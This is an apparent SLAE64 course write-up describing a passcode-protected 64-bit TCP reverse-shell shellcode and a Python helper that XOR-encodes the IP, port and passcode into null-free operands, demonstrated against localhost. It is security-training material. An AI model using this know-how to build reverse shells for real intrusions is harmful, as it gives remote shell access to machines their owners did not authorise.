The second assignment for the SLAE64 certification asks for a TCP reverse shell shellcode that connects to an address and a port and, after verifying a "passcode" on successful connection, executes a shell.

For the basic structure of a TCP reverse shell, please refer to assignment 5 and to the related assignment for the SLAE32 certification.

To verify the passcode, a code section has been added after the dup2 loop: it performs a read syscall that stores the 8 bytes received from the socket on the stack and compares them with the hardcoded passcode (acceptme, itself exactly 8 bytes).

If the comparison succeeds, execve is performed: Reverse TCP - Example with successful connection and passcode

If the submitted passcode is wrong, the program exits with status code 6: Reverse TCP - Example with wrong passcode submitted

I have also added a check after the connect() syscall: on failure the kernel returns a negative errno value in rax, so if the connection is not successful (e.g. because no listener is active on the chosen address and port) the program exits with status code 1 instead of blindly running dup2 and execve: Reverse TCP - Example with unsuccessful connection

Customization Utility

To make the reverse shell customizable, the ReverseShell-Skeleton.nasm file has been created with placeholders to be filled with the chosen IP and port (line 24).

Since the IP and port bytes have to be inserted XOR-ed with 0xFF, so that a null byte such as the ones in 127.0.0.1 never appears in the shellcode (the code restores them at runtime with the same XOR, which is equivalent to a bitwise NOT), the Python utility comes in handy: it just needs to be run with the IP and port for the connection as parameters, and the appropriate values are calculated and presented to the user. One caveat: 0xFF ^ 0xFF is 0x00, so an address or port containing a 0xFF byte (for example 10.255.0.1, or port 255 whose network-order bytes are 00 FF) still yields a null byte after encoding and cannot be used with this skeleton as is: Reverse TCP - Python utility
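The following is an added example of such an encoder, written for this page rather than taken from the author's utility. It packs sin_port and sin_addr in network byte order as struct sockaddr_in expects, XORs every byte with 0xFF, emits the little-endian immediates a `mov` in the skeleton would take, and flags the 0xFF case described above. The passcode helper assumes (this is not stated on the page) that the shellcode compares the 8 bytes read with a single qword immediate.

```python
#!/usr/bin/env python3
"""
Added example (not the page's own utility): compute the XOR-0xFF encoded
sockaddr_in fields for a reverse-shell skeleton and flag inputs that would
still leave a null byte in the shellcode.
"""
import argparse
import ipaddress
import struct

XOR_KEY = 0xFF  # XOR-ing each byte with 0xFF is the same as a bitwise NOT


def xor_bytes(data: bytes, key: int = XOR_KEY) -> bytes:
    """Per-byte XOR; applying it twice restores the original bytes."""
    return bytes(b ^ key for b in data)


def null_free(data: bytes) -> bool:
    """True when no byte is 0x00, the property the shellcode needs."""
    return b"\x00" not in data


def encode_sockaddr(ip: str, port: int) -> dict:
    """
    Encode sin_port and sin_addr (both in network byte order, as in
    struct sockaddr_in), XOR each byte with 0xFF and return the values to
    paste into the skeleton. The shellcode decodes them with `not`
    (or xor with 0xFFFF / 0xFFFFFFFF) before pushing the struct.
    """
    if not 0 < port < 65536:
        raise ValueError("port must be in 1..65535")
    port_raw = struct.pack(">H", port)          # what htons(port) produces
    ip_raw = ipaddress.IPv4Address(ip).packed   # what inet_aton(ip) produces
    port_xor = xor_bytes(port_raw)
    ip_xor = xor_bytes(ip_raw)
    return {
        "port_xor": port_xor,
        "ip_xor": ip_xor,
        # nasm emits `mov ax, imm16` / `mov edi, imm32` little-endian, so
        # these immediates put the bytes in memory in network order
        "port_imm16": struct.unpack("<H", port_xor)[0],
        "ip_imm32": struct.unpack("<I", ip_xor)[0],
        # 0xFF ^ 0xFF == 0x00: a 0xFF byte in the input breaks the scheme
        "null_free": null_free(port_xor + ip_xor),
    }


def passcode_qword(passcode: str) -> int:
    """
    Little-endian qword for an 8-byte passcode, assuming the shellcode
    compares the bytes read from the socket against one 64-bit immediate
    (e.g. `mov rbx, imm64` followed by `cmp [rsp], rbx`).
    """
    raw = passcode.encode()
    if len(raw) != 8:
        raise ValueError("passcode must be exactly 8 bytes")
    if not null_free(raw):
        raise ValueError("passcode must not contain null bytes")
    return int.from_bytes(raw, "little")


def main() -> None:
    parser = argparse.ArgumentParser(description="XOR-0xFF encoder for the skeleton")
    parser.add_argument("ip")
    parser.add_argument("port", type=int)
    parser.add_argument("--passcode", default="acceptme")
    args = parser.parse_args()

    enc = encode_sockaddr(args.ip, args.port)
    print(f"port (xor 0xFF): db {', '.join(f'0x{b:02x}' for b in enc['port_xor'])}")
    print(f"ip   (xor 0xFF): db {', '.join(f'0x{b:02x}' for b in enc['ip_xor'])}")
    print(f"mov ax,  0x{enc['port_imm16']:04x}   ; then: not ax")
    print(f"mov edi, 0x{enc['ip_imm32']:08x}   ; then: not edi")
    print(f"mov rbx, 0x{passcode_qword(args.passcode):016x}   ; passcode")
    if not enc["null_free"]:
        print("WARNING: encoded IP/port still contains a null byte (0xFF input)")


if __name__ == "__main__":
    main()
```

Run as `python3 encoder.py 127.0.0.1 6969` to get the operands for the localhost PoC; 127.0.0.1 encodes to 80 ff ff fe and port 6969 (0x1B39) to e4 c6, none of which is null.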

The following screenshot shows the shell connecting back to localhost on port 6969, with the placeholder values generated by the Python utility: Reverse TCP - PoC of the Python utility on localhost:6969

This assignment has been written on a Kali Linux 2021.1 64-bit virtual machine:

└─$ uname -a
Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux